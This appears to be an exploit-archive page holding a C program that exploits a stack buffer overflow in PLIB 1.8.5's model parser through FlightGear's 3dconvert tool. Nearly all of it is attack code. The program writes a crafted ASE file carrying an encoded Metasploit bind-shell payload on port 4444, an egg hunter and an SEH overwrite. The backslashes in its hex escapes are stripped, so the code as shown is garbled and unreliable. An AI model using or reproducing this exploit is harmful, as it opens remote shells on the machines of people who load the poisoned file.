[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PLIB 1.8.5 ssg/ssgParser.cxx Buffer Overflow
# Published : 2012-10-09
# Author :
# Previous Title : MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability
# Next Title : ActiveFax (ActFax) 4.3 Client Importer Buffer Overflow
/*
# Exploit Title: Plib + flightgear 3dconvert exploit
# Date: 08/10/2012
# Author: Andres Gomez
# Software Links:
# Plib: http://plib.sourceforge.net/
# flightgear: http://www.flightgear.org/
# 3dconvert: ftp://ftp.ihg.uni-duisburg.de/FlightGear/Win32/old/3dconvert-win32.zip
# Version: Plib 1.8.5
# Tested on: Windows XP Service Pack 3 Spanish
*/
/*
Plib is prone to stack based Buffer overflow in the error function in ssg/ssgParser.cxx when it loads
3d model files as X (Direct x), ASC, ASE, ATG, and OFF.
This exploit uses flightgear's utility 3dconvert. It creates a corrupted ASE file "test.ase", just run:
FlightGearbinWin323dconvert.exe test.ase test.obj
*/
#include <stdio.h>
#include <stdlib.h>
/*
Shellcode: msfpayload windows/shell_bind_tcp LPORT=4444 R | ./msfencode -e x86/alpha_mixed C
*/
unsigned char shellcode[] =
"x89xe0xddxc6xd9x70xf4x5dx55x59x49x49x49x49"
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51"
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32"
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41"
"x42x75x4ax49x69x6cx5ax48x4fx79x33x30x75x50"
"x67x70x71x70x4bx39x78x65x45x61x4ax72x71x74"
"x6cx4bx76x32x44x70x4ex6bx73x62x46x6cx6ex6b"
"x36x32x66x74x4cx4bx50x72x47x58x36x6fx4cx77"
"x50x4ax54x66x35x61x79x6fx45x61x4bx70x6ex4c"
"x47x4cx31x71x33x4cx35x52x56x4cx31x30x6ax61"
"x58x4fx34x4dx45x51x79x57x4dx32x6cx30x32x72"
"x61x47x4ex6bx66x32x44x50x4ex6bx47x32x37x4c"
"x55x51x6ex30x6ex6bx61x50x32x58x6ex65x79x50"
"x34x34x73x7ax46x61x5ax70x46x30x6ex6bx72x68"
"x66x78x6cx4bx63x68x55x70x66x61x78x53x49x73"
"x75x6cx77x39x6cx4bx64x74x6cx4bx57x71x7ax76"
"x45x61x39x6fx76x51x6bx70x4ex4cx5ax61x68x4f"
"x64x4dx66x61x4ax67x45x68x39x70x70x75x5ax54"
"x43x33x51x6dx58x78x45x6bx71x6dx47x54x54x35"
"x7ax42x53x68x4ex6bx66x38x44x64x53x31x4ex33"
"x43x56x4cx4bx56x6cx32x6bx4ex6bx36x38x77x6c"
"x37x71x4ax73x6ex6bx66x64x4cx4bx46x61x78x50"
"x4cx49x50x44x36x44x71x34x63x6bx53x6bx33x51"
"x46x39x70x5ax70x51x49x6fx49x70x32x78x61x4f"
"x70x5ax6cx4bx67x62x6ax4bx4dx56x43x6dx52x48"
"x67x43x46x52x47x70x43x30x65x38x50x77x54x33"
"x45x62x31x4fx71x44x65x38x62x6cx53x47x34x66"
"x53x37x39x6fx7ax75x6dx68x4ax30x35x51x53x30"
"x45x50x76x49x78x44x46x34x56x30x72x48x56x49"
"x4bx30x62x4bx43x30x39x6fx48x55x42x70x50x50"
"x76x30x52x70x73x70x70x50x51x50x62x70x75x38"
"x39x7ax36x6fx6bx6fx39x70x69x6fx48x55x6ex69"
"x58x47x35x61x79x4bx66x33x30x68x56x62x73x30"
"x37x61x63x6cx6cx49x6ax46x62x4ax64x50x73x66"
"x72x77x51x78x6ax62x49x4bx46x57x42x47x4bx4f"
"x39x45x73x63x61x47x35x38x58x37x69x79x30x38"
"x59x6fx69x6fx4ax75x61x43x31x43x53x67x30x68"
"x62x54x68x6cx65x6bx69x71x59x6fx68x55x56x37"
"x4dx59x7ax67x53x58x71x65x72x4ex42x6dx45x31"
"x6bx4fx68x55x43x58x53x53x42x4dx35x34x77x70"
"x4cx49x69x73x42x77x42x77x70x57x46x51x49x66"
"x30x6ax64x52x56x39x66x36x68x62x69x6dx75x36"
"x78x47x67x34x61x34x57x4cx67x71x47x71x4ex6d"
"x63x74x54x64x36x70x48x46x53x30x42x64x72x74"
"x46x30x46x36x76x36x42x76x53x76x63x66x42x6e"
"x72x76x53x66x56x33x62x76x51x78x42x59x68x4c"
"x75x6fx6bx36x49x6fx48x55x4dx59x4bx50x32x6e"
"x36x36x61x56x49x6fx76x50x53x58x43x38x6fx77"
"x57x6dx35x30x6bx4fx4bx65x6dx6bx58x70x78x35"
"x4ex42x72x76x63x58x6fx56x4cx55x6dx6dx6dx4d"
"x6bx4fx39x45x55x6cx37x76x61x6cx45x5ax4bx30"
"x6bx4bx69x70x54x35x77x75x4fx4bx77x37x52x33"
"x52x52x32x4fx51x7ax77x70x30x53x59x6fx6ax75"
"x41x41";
unsigned char egg_hunter [] =
"xdbxd9xd9x74x24xf4x5fx57x59x49x49x49x49x49"
"x49x49x49x49x43x43x43x43x43x43x43x37x51x5a"
"x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41"
"x42x32x42x42x30x42x42x41x42x58x50x38x41x42"
"x75x4ax49x43x56x4ex61x6ax6ax4bx4fx54x4fx51"
"x52x76x32x42x4ax33x73x51x48x68x4dx56x4ex75"
"x6cx66x65x30x5ax71x64x78x6fx4ex58x5ax30x52"
"x70x6ax30x30x50x6cx4bx79x6ax6ex4fx34x35x7a"
"x4ax4cx6fx62x55x6dx37x49x6fx6ax47x41x41";
unsigned char egg [] = "x90x50x90x50x90x50x90x50";
unsigned char seh_pointer [] = "x49x19xE1x08"; // seh pointer pop pop ret;
unsigned char short_jump [] = "xEBx0Cx41x41"; // short jump;
int main(int argc, char **argv) {
FILE *save_fd;
int i=0;
save_fd = fopen("test.ase", "w+");
if (save_fd == NULL) {
printf("Failed to open '%s' for writing", "test.ase");
return -1;
}
fprintf(save_fd, "*3DSMAX_ASCIIEXPORT 200n"
"*COMMENT "created by SSG."n"
"*SCENE {n"
" *SCENE_FILENAME ""n"
" *SCENE_FIRSTFRAME 0n"
" *SCENE_LASTFRAME 100n"
" *SCENE_FRAMESPEED 30n"
" *SCENE_TICKSPERFRAME 160n"
" *SCENE_BACKGROUND_STATIC 0.0000 0.0000 0.0000n"
" *SCENE_AMBIENT_STATIC 0.0431 0.0431 0.0431n"
"}n"
"*MATERIAL_LIST {n"
" *MATERIAL_COUNT 2n"
" *MATERIAL 0 {n"
" *MATERIAL_NAME "Material #0"n"
" *MATERIAL_CLASS "Standard"n"
" *MATERIAL_AMBIENT 1.000000 1.000000 1.000000n"
" *MATERIAL_DIFFUSE 1.000000 1.000000 1.000000n"
" *MATERIAL_SPECULAR 0.502000 0.502000 0.502000n"
" *MATERIAL_SHINE 50.000000n"
" *MATERIAL_SHINESTRENGTH 50.000000n"
" *MATERIAL_TRANSPARENCY 0.000000n"
" *MATERIAL_WIRESIZE 1.0000n"
" *MATERIAL_SHADING Blinnn"
" *MATERIAL_XP_FALLOFF 0.0000n"
" *MATERIAL_SELFILLUM 0.0000n"
" *MATERIAL_TWOSIDEDn"
" *MATERIAL_FALLOFF Inn"
" *MATERIAL_SOFTENn"
" *MATERIAL_XP_TYPE Filtern"
" *SUBMATERIAL ");
for(i=0; i < 573; i++) {
putc('x41', save_fd);
}
fprintf(save_fd, "%s", short_jump);
fprintf(save_fd, "%s", seh_pointer);
for(i=0; i < 0x0F; i++) {
putc('x90', save_fd);
}
fprintf(save_fd, "%s", egg_hunter);
for(i=0; i < 573; i++) {
putc('x41', save_fd);
}
fprintf(save_fd, "%s", egg);
fprintf(save_fd, "%s", shellcode);
fprintf(save_fd, " {n");
close(save_fd);
return 0;
}